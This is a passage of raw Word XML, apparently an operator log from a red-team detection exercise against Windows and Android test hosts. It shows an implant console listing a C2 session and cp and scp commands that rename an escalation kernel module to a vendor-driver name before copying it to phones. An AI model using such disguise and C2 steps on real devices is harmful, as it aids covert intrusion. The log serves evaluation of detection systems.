      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] 2204                                    &lt;unknown&gt;                                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC4FFEA" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] 2344                                    &lt;unknown&gt;                                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199A9292" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] 2752                                    &lt;unknown&gt;                                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F5A75B" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] 2848                                    &lt;unknown&gt;                                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4022305D" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] 2564              \Device\HarddiskVolume2\Windows\System32\taskhost.exe              </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA6459C" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] 2456                 \Device\HarddiskVolume2\Windows\System32\dwm.exe                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C96C1B" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] 1916                   \Device\HarddiskVolume2\Windows\explorer.exe                  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65451A27" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] 2196           \Device\HarddiskVolume2\Program Files\TightVNC\tvnserver.exe          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27093BE9" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] 2688                                    &lt;unknown&gt;                                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284C2925" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] 2768        \Device\HarddiskVolume2\Program Files\mozilla\firefox\firefox.exe        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD33F92" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] 2984                 \Device\HarddiskVolume2\Windows\System32\mmc.exe                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3A7053" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] 2644        \Device\HarddiskVolume2\Program Files\mozilla\firefox\firefox.exe        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF3E10B" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] 3768              \Device\HarddiskVolume2\Windows\System32\taskhost.exe              </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0D2202" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] 3584                 \Device\HarddiskVolume2\Windows\System32\cmd.exe                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DE9DB7" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] 4036               \Device\HarddiskVolume2\Windows\System32\conhost.exe              </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B553A0A" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] 336                                     &lt;unknown&gt;                                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA07330" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] 3652                                    &lt;unknown&gt;                                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596FE54F" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] 3224               \Device\HarddiskVolume2\Windows\System32\taskeng.exe              </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BCDE9E" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] 2544                                    &lt;unknown&gt;                                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB521D9" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] 3688                                    &lt;unknown&gt;                                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE0627D" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] 2536                                    &lt;unknown&gt;                                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2F3B63" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] 1872                                    &lt;unknown&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110626F9" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] 3800                                    &lt;unknown&gt;                                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3411E86A" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] 2184                                    &lt;unknown&gt;                                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0DE8B3" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] 1692                                    &lt;unknown&gt;            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A4EBB9" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FF40A19" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>13:29</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30343E85" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W1&gt;main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4F3B32" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9EE6EB" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        W1         128.55.12.66:49267 --&gt;   128.55.12.167:8640  [HTTP]  Fri May 17 13:01:31 2019        active 1677s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540DCBF1" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;con W1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3055BF15" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W1&gt;quit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64905CFF" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114C90B6" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        W1         128.55.12.66:49267 --&gt;   128.55.12.167:8640  [HTTP]  Fri May 17 13:01:31 2019        DEAD 1681s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41584313" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="237" w:name="_id4oek4b7t56" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="238" w:name="_Toc12600133"/>
      <w:bookmarkEnd w:id="237"/>
      <w:r>
        <w:t>Benign Activity Setup</w:t>
      </w:r>
      <w:bookmarkEnd w:id="238"/>
    </w:p>
    <w:p w14:paraId="72120924" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>13:11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F590BB" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">kududyn@kududyn-ProLiant-SL170s-G6:/e5/dist/elevate$ scp 20190503_filemon_win10.zip admin@128.55.12.66:./filemon.zip                                                                 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FBE2A14" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>The authenticity of host '128.55.12.66 (128.55.12.66)' can't be established.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D611A6D" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>ECDSA key fingerprint is 46:8e:b5:2f:b1:c1:f3:64:c1:c2:bd:7b:66:86:dc:f9.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113FCDA6" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Are you sure you want to continue connecting (yes/no)? yes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C10B22" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Warning: Permanently added '128.55.12.66' (ECDSA) to the list of known hosts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D4E92D" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">admin@128.55.12.66's password: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A022450" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">20190503_filemon_win10.zip                                                                                                                         100%   11KB  11.4KB/s   00:00    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F37D70B" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">kududyn@kududyn-ProLiant-SL170s-G6:/e5/dist/elevate$ scp 20190503_regmon_win10.zip  admin@128.55.12.66:./filemon.zip                                                                 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C41B3DD" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">admin@128.55.12.66's password: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9DEA4C" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">20190503_regmon_win10.zip                                                                                                                          100% 1651KB   1.6MB/s   00:00   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08322441" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06A57F66" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>13:14</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16151EDC" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>kududyn@kududyn-ProLiant-SL170s-G6:/e5/dist/elevate$ scp 20190503_regmon_win10.zip  admin@128.55.12.66:./regmon.zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434D973E" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">admin@128.55.12.66's password: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AFFDA4" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">20190503_regmon_win10.zip                                                                                                                          100% 1651KB   1.6MB/s   00:00  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A2476F" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>kududyn@kududyn-ProLiant-SL170s-G6:/e5/dist/elevate$ scp 20190503_filemon_win10.zip admin@128.55.12.66:./filemon.zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609B3268" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">admin@128.55.12.66's password: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE9ABC1" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">20190503_filemon_win10.zip                                                                                                                         100%   11KB  11.4KB/s   00:00 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6EDB22" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16D9A742" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>13:25</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0B77C7" w14:textId="5A00A70D" w:rsidR="005A0BE6" w:rsidRPr="00650FDF" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Tried to install regmon and fil</w:t>
      </w:r>
      <w:r w:rsidR="00650FDF">
        <w:t>emon on Marple-1 but it failed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DEAC45" w14:textId="12D11B57" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="239" w:name="_Toc12600134"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>14:27 -- TA1 ClearScope 1 and 2 -- MyApp APK AppStarter APK Micro APT (Failed)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="239"/>
    </w:p>
    <w:p w14:paraId="1183D8BE" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Copied and installed the BinFmt-Elevate driver on both phones.  Tried to install 2 different apps to download and run Micro APT, but in both cases, Micro APT failed to connect out for C2.  Retried the test multiple times.  Eventually ran the test using Micro APT from ADB shell as tester.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1EA64D" w14:textId="57EC99E8" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="240" w:name="_sjyk6x7bm86m" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="241" w:name="_Toc12600135"/>
      <w:bookmarkEnd w:id="240"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Targets</w:t>
      </w:r>
      <w:bookmarkEnd w:id="241"/>
    </w:p>
    <w:p w14:paraId="54DE9111" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>ta1-clearscope-translate-test</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>128.55.12.114</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Android 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797022BF" w14:textId="6BCCB8B3" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="242" w:name="_bhd4wgg0j6yj" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="243" w:name="_Toc12600136"/>
      <w:bookmarkEnd w:id="242"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Capabilities</w:t>
      </w:r>
      <w:bookmarkEnd w:id="243"/>
    </w:p>
    <w:p w14:paraId="5DF1F6F7"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AppStarter  APK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269C4C0E" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Drakon APT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551E8542" w14:textId="1D439D1B" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="244" w:name="_ltixvly3w5c" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="245" w:name="_Toc12600137"/>
      <w:bookmarkEnd w:id="244"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Benign Activity Setup</w:t>
      </w:r>
      <w:bookmarkEnd w:id="245"/>
    </w:p>
    <w:p w14:paraId="0EEB1C75" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>14:27</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CAF620F" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>kududyn@kududyn-ProLiant-SL170s-G6:~/tmp$ cp elevate-android-arm64.ko msm_g711tlaw</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F51C413" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>kududyn@kududyn-ProLiant-SL170s-G6:~/tmp$ mv msm_g711tlaw msm_g711tlaw.ko</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDBD2AA" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>kududyn@kududyn-ProLiant-SL170s-G6:~/tmp$ scp msm_g711tlaw.ko admin@128.55.12.54:.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722D7B5A" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">admin@128.55.12.54's password: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E2235B" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">msm_g711tlaw.ko                                                                                                                                    100%   10KB   9.9KB/s   00:00    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F73370B" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>kududyn@kududyn-ProLiant-SL170s-G6:~/tmp$ cp binfmt-android-arm64.ko a64.ko</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62138ACB" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>kududyn@kududyn-ProLiant-SL170s-G6:~/tmp$ scp a64.ko admin@128.55.12.54:.</w:t>
      </w:r>
    </w:p>
